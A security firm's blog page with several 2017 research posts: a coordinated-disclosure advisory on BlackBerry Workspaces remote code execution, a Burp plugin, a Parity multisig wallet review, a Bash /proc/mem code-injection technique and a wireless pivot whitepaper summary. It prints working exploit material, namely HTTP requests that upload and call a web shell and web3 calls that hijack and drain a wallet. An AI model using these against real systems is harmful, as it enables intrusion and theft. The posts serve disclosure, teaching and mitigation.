Search
RSS Feed
Twitter
Monday
Oct162017

Remote Code Execution in BlackBerry Workspaces Server

Overview

Gotham Digital Science (GDS) has discovered a vulnerability affecting BlackBerry Workspaces Server (formerly WatchDox). Prior to being patched, it was possible to remotely execute arbitrary code by exploiting insecure file upload functionality as an unauthenticated user. Additionally, source code disclosure was possible by issuing an HTTP request for a Node.js file inside of the server’s webroot.

CVE-2017-9367 and CVE-2017-9368 were discovered by Eric Rafaloff during a client engagement conducted by Gotham Digital Science.

BlackBerry’s security advisory regarding these vulnerabilities is available here: BSRT-2017-006

Vulnerable Versions

The following Workspaces Server components are known to be vulnerable:

  • Appliance-X versions 1.11.2 and earlier
  • vApp versions 5.6.0 to 5.6.6
  • vApp versions 5.5.9 and earlier

Timeline

  • 5/10/17 - CVE-2017-9367 and CVE-2017-9368 disclosed to BlackBerry.
  • 5/10/17 - BlackBerry acknowledges receiving our report.
  • 5/16/17 - BlackBerry confirms that an investigation has started.
  • 6/6/17 - BlackBerry confirms the reported security vulnerabilities and communicates that they will be issuing two CVEs.
  • 6/28/17 - BlackBerry confirms that development has started on fixes for the two reported vulnerabilities, requests delay of disclosure.
  • 9/6/17 - BlackBerry states that their advisory is expected to be made on September 12th.
  • 9/7/17 - BlackBerry states that their advisory will need to be pushed back until October 10th, requests additional delay of disclosure.
  • 9/13/17 - BlackBerry requests additional delay of disclosure to October 16th.
  • 10/16/17 - GDS and BlackBerry coordinated disclosure.

GDS commends BlackBerry for their diligence and consistent communication during the disclosure process.

Issue Description

The BlackBerry Workspaces Server offers a file server API, with which files can be uploaded and downloaded. GDS found that by making an unauthenticated HTTP GET request for /fileserver/main.js, it was possible to view the file server’s source code (CVE-2017-9368).

Reproduction Request #1

GET /fileserver/main.js HTTP/1.1
Host: [REMOVED BY GDS]

Reproduction Response #1

HTTP/1.1 200 OK
[..snip..]

By analyzing this disclosed source code, GDS located a directory traversal vulnerability affecting the saveDocument endpoint of the file server API. This endpoint did not require authentication, and when exploited allowed GDS to obtain remote code execution by uploading a web shell to the server’s webroot (CVE-2017-9367).

Reproduction Request #2

POST /fileserver/saveDocument HTTP/1.1
[..snip..]
Content-Type: multipart/form-data; boundary=---------------------------1484231460308104668732082159
Content-Length: 1286
 
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uuid"
 
/../../mnt/filespace/0/whiteLabel/
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="fileName"
 
shell.jsp
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="store"
 
local
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uploadFile"; filename="test"
 
[..snip..]
-----------------------------1484231460308104668732082159--

Reproduction Response #2

HTTP/1.1 200 OK
[..snip..]
 
{"success":"true"}

Reproduction Request #3

GET /whiteLabel/shell.jsp?cmd=whoami HTTP/1.1
[..snip..]

Reproduction Response #3

HTTP/1.1 200 OK
[..snip..]
 
<pre>Command was: <b>whoami</b>
 
watchdox
</pre>

Impact

CVE-2017-9368 allows unauthorized disclosure of application source code. This can be exploited by an unauthenticated user to discover additional security vulnerabilities (such as CVE-2017-9367).

CVE-2017-9367 allows an unauthenticated user to upload and run executable code, and as such can be used to compromise the integrity of the entire application and its data. For example, upon exploitation of this vulnerability, GDS was able to read the contents of the Workspace Server’s database and compromise highly sensitive information.

Remediation

GDS recommends that affected users update immediately to a patched version of the product. BlackBerry has confirmed that the following Workspaces Server components are not affected:

  • Appliance-X version 1.12.0 and later
  • Appliance-X version 1.11.3 and later
  • vApp version 5.7.2 and later
  • vApp version 5.6.7 and later
  • vApp version 5.5.10 and later
Tuesday
Oct102017

Pentesting Fast Infoset based web applications with Burp

If you run into a .NET application you sometimes end up with some not very well known protocols like WCF Binary protocol or, in a recent case, a Fast Infoset binary encoding - a binary encoding of the XML Infoset and an alternative to the usual text-based XML Infoset encoding. We will briefly describe the Fast Infoset format and present a Burp plugin, which facilitates pentesting web applications using this XML representation.

Fast Infoset is a lossless compression format for XML-based data. The format is mostly utilised in web applications that transfer a large amount of data between a client and a server; usually a thick client processing data offline and exchanging data infrequently with a server. You can identify that Fast Infoset is involved when an HTTP request uses a Content-Type of application/fastinfoset.

An example request may look like this:

If you decompress the body with gzip, it is a little bit more readable.

From an attacker’s perspective, the main problem with this encoding format is that you can’t easily edit requests or responses on-the-fly like you would with text-based message bodies.Since the encoding relies on the previous and following strings, if you try to tamper with the data, the server will throw an exception saying that the data which you just have sent it is not properly encoded.

Some quick research revealed a few public repositories implementing Fast Infoset decoding but only one was working properly (written by Lu Jun). However, this plugin does not support editing and re-encoding decoded Fast Infoset data, only viewing it.

We decided it would be a worthwhile effort to develop a fully working Burp plugin for decoding and encoding Fast Infoset based requests. You can find a compiled JAR and the corresponding source code in the following Github repository:
https://github.com/GDSSecurity/FastInfoset-Burp-Plugin

Once you load the plugin via Burp extender, you can easily view decoded Fast Infoset requests and responses, and tamper with them in Burp Proxy and Repeater.


Wednesday
Sep272017

Reviewing Ethereum Smart Contracts

Ethereum has been in the news recently due to a string of security incidents affecting smart contracts running on the platform. As a security engineer, these stories piqued my interest and I began my own journey down the rabbit hole that is Ethereum “dapp” (decentralized application) development and security. I think it is a fascinating technology with some talented engineers pushing the boundaries of what is possible in an otherwise trustless network. The community has also begun to mature, as projects have started bug bounties, security best practices have been published, and vulnerabilities in the technology itself have been patched.

Still, if Ethereum’s popularity is to continue to grow, I believe that it is going to need the help of the wider security industry. And therein is a problem. Most security engineers still don’t know what Ethereum even is, let alone how to perform a security review of an application running on it.

As it turns out, there are some pretty big similarities between traditional code review and Ethereum smart contract review. This is because smart contracts are functionally just ABI (application binary interface) services. They are similar to the very API services that many security engineers are accustomed to reviewing, but use a binary protocol and set of conventions specific to Ethereum. Unsurprisingly, these details are also what make Ethereum smart contracts prone to several specific types of bugs, such as those relating to function reentrancy and underflows. These vulnerabilities are important to understand as well, although they are a bit more advanced and best suited for another blog post.

Let us take a look at a case study to examine the similarities between traditional code review and smart contract review.

A Case Study: The Parity “Multi-Sig” Vulnerability

On July 19, 2017, a popular Ethereum client named Parity was found to contain a critical vulnerability that lead to the theft of $120MM. Parity allows users to setup wallets that can be managed by multiple parties, such that some threshold of authorized owners must sign a transaction before it is executed on the network. Because this is not a native feature built into the Ethereum protocol, Parity maintains its own open source Ethereum smart contract to implement this feature. When a user wants to create a multi-signature wallet, they actually deploy their own copy of the smart contract. As it turned out, Parity’s multi-signature smart contract contained a vulnerability that, when exploited, allowed unauthorized users to rob a wallet of all of its Ether (Ethereum’s native cryptocurrency).

Parity’s multi-signature wallet is based off of another open source smart contract that can be found here. Both are written in Solidity, which is a popular Ethereum programming language. Solidity looks and feels a lot like JavaScript, but allows developers to create what are functionally ABI services by making certain functions callable by other agents on the network. An important feature of the language is that ABI functions are publicly callable by default, unless they are marked as “private” or “internal”.

In December of 2016, a redesigned version of the multi-signature wallet contract was added to Parity’s GitHub repository with some considerable changes. The team decided to refactor the contract into a library. This meant that calls to individual multi-signature wallets would actually be forwarded to a single, hosted library contract. This implementation detail wouldn’t be obvious to a caller unless they examined the code or ran a debugger.

Unfortunately, it is during this refactor that a critical security vulnerability was introduced into the code base. When the contract code was transformed into a single contract (think class in object-oriented programming), all of the initializer functions lost the important property of initialization: Only being callable once. It was therefore possible to re-call the contract’s initialization function even after it had already been deployed and initialized, and change the settings of the contract.

How can attacks like the one on Parity’s contract be avoided? As it turns out, the vulnerability would have likely been caught by a short code review.

Profiling Solidity Functions

As I mentioned, Ethereum smart contracts are functionally just ABI services. One of the first things we do as security engineers when reviewing an application is to map out which endpoints we have authorization (intentionally or unintentionally) to interact with.

We can easily do this for a Solidity application using a tool I wrote called the Solidity Function Profiler. Let’s run it on a vulnerable version of the multi-signature contract described earlier, looking for visible (public or external) functions that aren’t constants (possibly state changing) and don’t use any modifiers (which may be authorization checks). If we were looking for new vulnerabilities, we would obviously apply much more scrutiny to the output of the tool. For the sake of this blog post, simply looking for functions that fit the above criteria is adequate.

For those who want to follow along at home, a vulnerable version of the contract code can be found here. This is the code that we will be referencing throughout the rest of this blog post.

Four functions fit this criteria and have been bolded in the table below.

Contract Function Visibility Constant Returns Modifiers
WalletLibrary () public false
payable
WalletLibrary initMultiowned(address,uint) public false

WalletLibrary revoke(bytes32) external false

WalletLibrary changeOwner(address,address) external false
onlymanyowners
WalletLibrary addOwner(address) external false
onlymanyowners
WalletLibrary removeOwner(address) external false
onlymanyowners
WalletLibrary changeRequirement(uint) external false
onlymanyowners
WalletLibrary getOwner(uint) external true address
WalletLibrary isOwner(address) public true bool
WalletLibrary hasConfirmed(bytes32,address) external true bool
WalletLibrary initDaylimit(uint) public false

WalletLibrary setDailyLimit(uint) external false
onlymanyowners
WalletLibrary resetSpentToday() external false
onlymanyowners
WalletLibrary initWallet(address,uint,uint) public false

WalletLibrary kill(address) external false
onlymanyowners
WalletLibrary execute(address,uint,bytes) external false o_hash onlyowner
WalletLibrary create(uint,bytes) internal false o_addr
WalletLibrary confirm(bytes32) public false o_success onlymanyowners
WalletLibrary confirmAndCheck(bytes32) internal false bool
WalletLibrary reorganizeOwners() private false

WalletLibrary underLimit(uint) internal false bool onlyowner
WalletLibrary today() private true uint
WalletLibrary clearPending() internal false

Wallet Wallet(address,uint,uint) public false

Wallet () public false
payable
Wallet getOwner(uint) public true address
Wallet hasConfirmed(bytes32,address) external true bool
Wallet isOwner(address) public true bool

Call Delegation

All four identified functions are found in the contract’s library, meaning that we may not be able to reach them because the main Wallet contract doesn’t expose them. However, a quick read of the source code reveals the use of a call forwarding pattern that delegates calls made to the Wallet contract to the WalletLibrary contract. This is done via a fallback function, which is a special function that gets called when no matching function is found during a call or when Ether is sent to a contract. With this information we know that these functions can be called.

395: contract Wallet is WalletEvents {
[..snip..]
423:   // gets called when no other function matches
424:   function() payable {
425:     // just being sent some cash?
427:     if (msg.value > 0)
428:       Deposit(msg.sender, msg.value);
429:     else if (msg.data.length > 0)
430:       _walletLibrary.delegatecall(msg.data);
431:   }

This call delegation pattern is typically discouraged due to the security implications it can pose when calling external, untrusted contracts. In this case the delegatecall function is used to proxy calls to what would be a trusted library contract, so while it is a bad practice it isn’t an active issue here. If the contract’s developers had been more explicit about what calls were allowed to be delegated by this function, the vulnerability may have never existed. However, the delegation itself is not the direct cause of the vulnerability, and continues to exist even in the patched version of this contract.

The Vulnerability: Wallet Reinitialization

If we look at the source code associated with the four functions listed above, we discover that the revoke function performs an authorization check. However, the remaining three functions don’t perform such a check and seem like they might be quite interesting. For example, the initMultiowned function sets the contract’s list of owners and the number of signatures required to perform transactions:

105:   // constructor is given number of sigs required to do protected "onlymanyowners" transactions
106:   // as well as the selection of addresses capable of confirming them.
107:   function initMultiowned(address[] _owners, uint _required) {
108:     m_numOwners = _owners.length + 1;
109:     m_owners[1] = uint(msg.sender);
110:     m_ownerIndex[uint(msg.sender)] = 1;
111:     for (uint i = 0; i < _owners.length; ++i)
112:     {
113:       m_owners[2 + i] = uint(_owners[i]);
114:       m_ownerIndex[uint(_owners[i])] = 2 + i;
115:     }
116:     m_required = _required;
117:   }

The initDaylimit function changes the daily limit on the amount of Ether that is allowed to be transacted:

200:   // constructor - stores initial daily limit and records the present day's index.
201:   function initDaylimit(uint _limit) {
202:     m_dailyLimit = _limit;
203:     m_lastDay = today();
204:   }

The initWallet function simply calls the two functions described above, passing them the function’s own arguments as wallet settings:

214:   // constructor - just pass on the owner array to the multiowned and
215:   // the limit to daylimit
216:   function initWallet(address[] _owners, uint _required, uint _daylimit) {
217:     initDaylimit(_daylimit);
218:     initMultiowned(_owners, _required);
219:   }

All of this makes sense so far, as these functions are used to initialize the state of a new wallet. However, what are these functions used for once the wallet is initialized? What would stop them from simply being re-called and overwriting the wallet’s settings?

The answer to both questions is nothing. These functions are intended to only be called once by the original owner, but there isn’t anything enforcing this. There are no authorization checks, no visibility specifiers to make the functions internal, and not a single check to make sure that the wallet hasn’t been initialized already.

This is the root cause of the vulnerability. These functions are public and state changing, and we’ve discovered this using the Solidity Function Profiler and a bit of manual code review.

Proof of Concept Reproduction

The attacker’s exploit code may have looked something like this (using the Web3 JavaScript API):

// "Reinitialize" the wallet by calling initWallet
web3.eth.sendTransaction({from: attacker, to: victim, data: "0xe46dcfeb0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000" + attacker.slice(2,42)}); 

// Send 100 ETH to the attacker by calling execute 
web3.eth.sendTransaction({from: attacker, to: victim, data: "0xb61d27f6000000000000000000000000" + attacker.slice(2,42) + "0000000000000000000000000000000000000000000000056bc75e2d6310000000000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000"})

It can be a little difficult to parse out what’s going on with raw call data. Let’s break this down a bit further using a more in-depth example reproduction. Consider the following actors with the corresponding addresses:

  •  Multi-Sig Wallet Contract: 0xde6a66562c299052b1cfd24abc1dc639d429e1d6
  •  Original Owner Account: 0x14723a09acff6d2a60dcdf7aa4aff308fddc160c
  •  Second Owner Account: 0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db
  •  Attacker Account: 0xca35b7d915458ef540ade6068dfe2f44e8fa733c

The initialization of a multi-signature wallet would look something like this, where the first argument is an array of additional owner addresses, the second is the number of signatures required, and the third is a daily limit:

From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call initWallet([“0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db”], 2, 3)
Result 0x
Events none

We can see that there are now two owners, one being the original owner and the other being the second owner:

From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call m_numOwners
Result 2
Events none
From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call getOwner(0)
Result 0x14723a09acff6d2a60dcdf7aa4aff308fddc160c
Events none
From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call getOwner(1)
Result 0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db
Events none

The original owner and the second owner would then deposit funds into the wallet by sending the contract Ether (which would actually call the fallback function, which gets called when Ether is sent).

We can confirm that attempting to make a privileged call (any function using the onlymanyowners modifier) as an owner does generate a confirmation event. For example, attempting to execute a transaction above the daily limit (expressed as Wei in the call, rather than Ether) generates a confirmation event as well as a confirmationRequired event. This is expected since an additional signature is required:

From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call execute(“0xdd870fa1b7c4700f2bd7f44238821c26f7392148”, “1000000000000000000”, [])
Result 0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1
Events Confirmation[
 “0x14723a09acff6d2a60dcdf7aa4aff308fddc160c”,
 “0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1”
]

ConfirmationNeeded[
 “0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1”,
 “0x14723a09acff6d2a60dcdf7aa4aff308fddc160c”,
 “4”,
 “0x0”,
 “0x”
]

We can also confirm that attempting to make a multi-signature call as the attacker results in no execution or event generation, as the attacker’s address isn’t in the map of owner addresses. The call fails immediately:

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call execute(“0xca35b7d915458ef540ade6068dfe2f44e8fa733c”, “1000000000000000000”, [])
Result 0x0000000000000000000000000000000000000000000000000000000000000000
Events none

Now that we have a baseline for expected contract behavior, let’s break it by simply “reinitializing” the contract as the attacker. We give the function an array of owner addresses containing just the attacker’s address. This actually sets two owner addresses (both being the attacker’s), since the contract uses the sender’s address as well as the list of supplied owner addresses. This is an important detail for an attacker to consider, because the initWallet function doesn’t ensure that all previous owners are removed (and therefore locked out of the wallet). The side effect of calling the initWallet function again that is being exploited here is that it overwrites the first N elements of the owner address map, where N is the length of our supplied list of owner addresses:

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call initWallet([“0xca35b7d915458ef540ade6068dfe2f44e8fa733c”], 1, 0)
Result 0x
Events none

Querying the contract again for the first owner, we now get:

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call getOwner(0)
Result 0xca35b7d915458ef540ade6068dfe2f44e8fa733c
Events none
From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call getOwner(1)
Result 0xca35b7d915458ef540ade6068dfe2f44e8fa733c
Events none

We can also see that the number of required owners has also been successfully changed. The daily limit is irrelevant in this case because the contract ignores it if only 1 signature is required.

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call m_required
Result 1
Events none

At this point it is trivial for the attacker to steal all of the funds in the wallet. The attacker is an owner and only one signature is required. The returned 0 indicates that there is no associated ConfirmationNeeded data, and that the contract has paid out:

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call execute(“0xca35b7d915458ef540ade6068dfe2f44e8fa733c”,  “100000000000000000000”, [])
Result 0x0000000000000000000000000000000000000000000000000000000000000000
Events SingleTransact[
 “0x14723a09acff6d2a60dcdf7aa4aff308fddc160c”,
  “100000000000000000000”,
 “0xca35b7d915458ef540ade6068dfe2f44e8fa733c”,
 “0x”,
 “0x0”
]

In this fictional example, the attacker has made off with 100 Ether (currently ~$30,000 USD).

Conclusion

Attacks involving transaction malleability, function reentrancy, and underflows all dwarf this kind of vulnerability in complexity. However, sometimes the worst vulnerabilities are hiding in plain sight rather than underhanded or buggy code.

We have seen that applying a simple code review technique of profiling an application would have likely caught this vulnerability early on. Knowledge of the Solidity language and the EVM is required, but these can be picked up by consulting documentation, known pitfalls, and open source code bases. The underlying code review methodology stays largely the same.

Tuesday
Sep052017

Linux based inter-process code injection without ptrace(2)

Using the default permission settings found in most major Linux distributions it is possible for a user to gain code injection in a process, without using ptrace. Since no syscalls are required using this method, it is possible to accomplish the code injection using a language as simple and ubiquitous as Bash. This allows execution of arbitrary native code, when only a standard Bash shell and coreutils are available. Using this technique, we will show that the noexec mount flag can be bypassed by crafting a payload which will execute a binary from memory.

The /proc filesystem on Linux offers introspection of the running of the Linux system. Each process has its own directory in the filesystem, which contains details about the process and its internals. Two pseudo files of note in this directory are maps and mem. The maps file contains a map of all the memory regions allocated to the binary and all of the included dynamic libraries. This information is now relatively sensitive as the offsets to each library location are randomised by ASLR. Secondly, the mem file provides a sparse mapping of the full memory space used by the process. Combined with the offsets obtained from the maps file, the mem file can be used to read from and write directly into the memory space of a process. If the offsets are wrong, or the file is read sequentially from the start, a read/write error will be returned, because this is the same as reading unallocated memory, which is inaccessible.

The read/write permissions on the files in these directories are determined by the ptrace_scope file in /proc/sys/kernel/yama, assuming no other restrictive access controls are in place (such as SELinux or AppArmor). The Linux kernel offers documentation for the different values this setting can be set to. For the purposes of this injection, there are two pairs of settings. The lower security settings, 0 and 1, allow either any process under the same uid, or just the parent process, to write to a processes /proc/${PID}/mem file, respectively. Either of these settings will allow for code injection. The more secure settings, 2 and 3, restrict writing to admin-only, or completely block access respectively. Most major operating systems were found to be configured with ‘1’ by default, allowing only the parent of a process to write into its /proc/${PID}/mem file.

This code injection method utilises these files, and the fact that the stack of a process is stored inside a standard memory region. This can be seen by reading the maps file for a process:

$ grep stack /proc/self/maps
7ffd3574b000-7ffd3576c000 rw-p 00000000 00:00 0                          [stack]

Among other things, the stack contains the return address (on architectures that do not use a ‘link register’ to store the return address, such as ARM), so a function knows where to continue execution when it has completed. Often, in attacks such as buffer overflows, the stack is overwritten, and the technique known as ROP is used to assert control over the targeted process. This technique replaces the original return address with an attacker controlled return address. This will allow an attacker to call custom functions or syscalls by controlling execution flow every time the ret instruction is executed.

This code injection does not rely on any kind of buffer overflow, but we do utilise a ROP chain. Given the level of access we are granted, we can directly overwrite the stack as present in /proc/${PID}/mem.

Therefore, the method uses the /proc/self/maps file to find the ASLR random offsets, from which we can locate functions inside a target process. With these function addresses we can replace the normal return addresses present on the stack and gain control of the process. To ensure that the process is in an expected state when we are overwriting the stack, we use the sleep command as the slave process which is overwritten. The sleep command uses the nanosleep syscall internally, which means that the sleep command will sit inside the same function for almost its entire life (excluding setup and teardown). This gives us ample opportunity to overwrite the stack of the process before the syscall returns, at which point we will have taken control with our manufactured chain of ROP gadgets. To ensure that the location of the stack pointer at the time of the syscall execution, we prefix our payload with a NOP sled, which will allow the stack pointer to be at almost any valid location, which upon return will just increase the stack pointer until it gets to and executes our payload.

A general purpose implementation for code injection can be found at https://github.com/GDSSecurity/Cexigua. Efforts were made to limit the external dependencies of this script, as in some very restricted environments utility binaries may not be available. The current list of dependencies are:

  • GNU grep (Must support -Fao --byte-offset)
  • dd (required for reading/writing to an absolute offset into a file)
  • Bash (for the math and other advanced scripting features)

The general flow of this script is as follows:

Launch a copy of sleep in the background and record its process id (PID). As mentioned above, the sleep command is an ideal candidate for injection as it only executes one function for its whole life, meaning we won’t end up with unexpected state when overwriting the stack. We use this process to find out which libraries are loaded when the process is instantiated.

Using /proc/${PID}/maps we try to find all the gadgets we need. If we can’t find a gadget in the automatically loaded libraries we will expand our search to system libraries in /usr/lib. If we then find the gadget in any other library we can load that library into our next slave using LD_PRELOAD. This will make the missing gadgets available to our payload. We also verify that the gadgets we find (using a naive ‘grep’) are within the .text section of the library. If they are not, there is a risk they will not be loaded in executable memory on execution, causing a crash when we try to return to the gadget. This ‘preload’ stage should result in a possibly empty list of libraries containing gadgets missing from the standard loaded libraries.

Once we have confirmed all gadgets can be available to us, we launch another sleep process, LD_PRELOADing the extra libraries if necessary. We now re-find the gadgets in the libraries, and we relocate them to the correct ASLR base, so we know their location in the memory space of the target region, rather than just the binary on disk. As above, we verify that the gadget is in an executable memory region before we commit to using it.

The list of gadgets we require is relatively short. We require a NOP for the above discussed NOP sled, enough POP gadgets to fill all registers required for a function call, a gadget for calling a syscall, and a gadget for calling a standard function. This combination will allow us to call any function or syscall, but does not allow us to perform any kind of logic. Once these gadgets have been located, we can convert pseudo instructions from our payload description file into a ROP payload. For example, for a 64bit system, the line ‘syscall 60 0’ will convert to ROP gadgets to load ‘60’ into the RAX register, ‘0’ into RDI, and a syscall gadget. This should result in 40 bytes of data: 3 addresses and 2 constants, all 8 bytes. This syscall, when executed, would call exit(0).

We can also call functions present in the PLT, which includes functions imported from external libraries, such as glibc. To locate the offsets for these functions, as they are called by pointer rather than syscall number, we need to first parse the ELF section headers in the target library to find the function offset. Once we have the offset we can relocate these as with the gadgets, and add them to our payload.

String arguments have also been handled, as we know the location of the stack in memory, so we can append strings to our payload and add pointers to them as necessary. For example, the fexecve syscall requires a char** for the arguments array. We can generate the array of pointers before injection inside our payload and upon execution the pointer on the stack to the array of pointers can be used as with a normal stack allocated char**.

Once the payload has been fully serialized, we can overwrite the stack inside the process using dd, and the offset to the stack obtained from the /proc/${PID}/maps file. To ensure that we do not encounter any permissions issues, it is necessary for the injection script to end with the ‘exec dd’ line, which replaces the bash process with the dd process, therefore transferring parental ownership over the sleep program from bash to dd.

After the stack has been overwritten, we can then wait for the nanosleep syscall used by the sleep binary to return, at which point our ROP chain gains control of the application and our payload will be executed.

The specific payload to be injected as a ROP chain can reasonably be anything that does not require runtime logic. The current payload in use is a simple open/memfd_create/sendfile/fexecve program. This disassociates the target binary with the filesystem noexec mount flag, and the binary is then executed from memory, bypassing the noexec restriction. Since the sleep binary is backgrounded on execution by bash, it is not possible to interact with the binary to be executed, as it does not have a parent after dd exits. To bypass this restriction, it is possible to use one of the examples present in the libfuse distribution, assuming fuse is present on the target system: the passthrough binary will create a mirrored mount of the root filesystem to the destination directory. This new mount is not mounted noexec, and therefore it is possible to browse through this new mount to a binary, which will then be executable.

A proof of concept video shows this passthrough payload allowing execution of a binary in the current directory, as a standard child of the shell.

Future work:

To speed up execution, it would be useful to cache the gadget offset from its respective ASLR base between the preload and the main run. This could be accomplished by dumping an associative array to disk using declare -p, but touching disk is not necessarily always appropriate. Alternatives include rearchitecting the script to execute the payload script in the same environment as the main bash process, rather than a child executed using $(). This would allow for the sharing of environmental variables bidirectionally.

Limit the external dependencies further by removing the requirement for GNU grep. This was previously attempted and deemed too slow when finding gadgets, but may be possible with more optimised code.

The obvious mitigation strategy for this technique is to set ptrace_scope to a more restrictive value. A value of 2 (superuser only) is the minimum that would block this technique, whilst not completely disabling ptrace on the system, but care should be taken to ensure that ptrace as a normal user is not in use. This value can be set by adding the following line to /etc/sysctl.conf:

kernel.yama.ptrace_scope=2

Other mitigation strategies include combinations of Seccomp, SELinux or Apparmor to restrict the permissions on sensitive files such as /proc/${PID}/maps or /proc/${PID}/mem.

The proof of concept code, and Bash ROP generator can be found at https://github.com/GDSSecurity/Cexigua

Thursday
Aug312017

Whitepaper: The Black Art of Wireless Post-Exploitation - Bypassing Port-Based Access Controls Using Indirect Wireless Pivots

At DEF CON 25 we introduced a novel attack that can be used to bypass port-based access controls in WPA2-EAP networks. We call this technique an Indirect Wireless Pivot. The attack, which affects networks implemented using EAP-PEAP or EAP-TTLS, takes advantage of the fact that port-based access control mechanisms rely on the assumption that the physical layer can be trusted. Just as a NAC cannot effectively protect network endpoints if the attacker has physical access to a switch, a NAC can also be bypassed if the attacker can freely control the physical layer using rogue access point attacks. The fact that this technique is possible invalidates some common assumptions about wireless security. Specifically, it demonstrates that port-based NAC mechanisms do not effectively mitigate the risk presented by weak WPA2-EAP implementations. 

While creating the Indirect Wireless Pivot, we also developed a second technique that we call the Hostile Portal Attack. This second technique can be used to perform SMB Relay attacks and harvest Active Directory credentials without direct network access. Both techniques are briefly described below, and in greater detail in the attached PowerPoint slides and whitepaper.
     

Hostile Portal Attacks

This is a weaponization of the captive portals typically used to restrict access to open networks in environments such as hotels and coffee shops. Instead of redirecting HTTP traffic to a login page, the hostile portal redirects traffic to a SMB share located on the attacker’s machine. The result is that after the victim is forced to associate with the attacker using a rogue access point attack, any HTTP traffic generated by the victim will cause the victim’s machine to attempt NTLM authentication with the attacker. The attacker also performs an LLMNR/NBT-NS poisoning attack against the victim.
The Hostile Portal attack gets you results that are similar to what you’d expect from LLMNR/NBT-NS poisoning, with some distinct advantages:
  • Stealthy: No direct network access is required
  • Large Area of Effect: Works across multiple subnets – you get everything that is connected to the wireless network
  • Efficient: This is an active attack that forces clients to authenticate with you. The attacker does not have to wait for a network event to occur, as with LLMNR/NBT-NS poisoning. 

Indirect Wireless Pivots

The Indirect Wireless Pivot is a technique for bypassing port-based access control mechanisms using rogue access point attacks. The attacker first uses a rogue AP attack to coerce one or more victims into connecting. A Hostile Portal Attack is then combined with an SMB Relay attack to place a timed payload on the client. The rogue access point is then terminated, allowing the client to reassociate with the target network. After a delay, the payload will execute, causing the client to send a reverse shell back to the attacker’s first interface. Alternatively, this attack can be used to place an implant on the client device.
   

PowerPoint Slides and Whitepaper:

For an in-depth look at both of these attacks, check out the Power Point slides and whitepaper on the subject. 

PowerPoint Slides:
Whitepaper: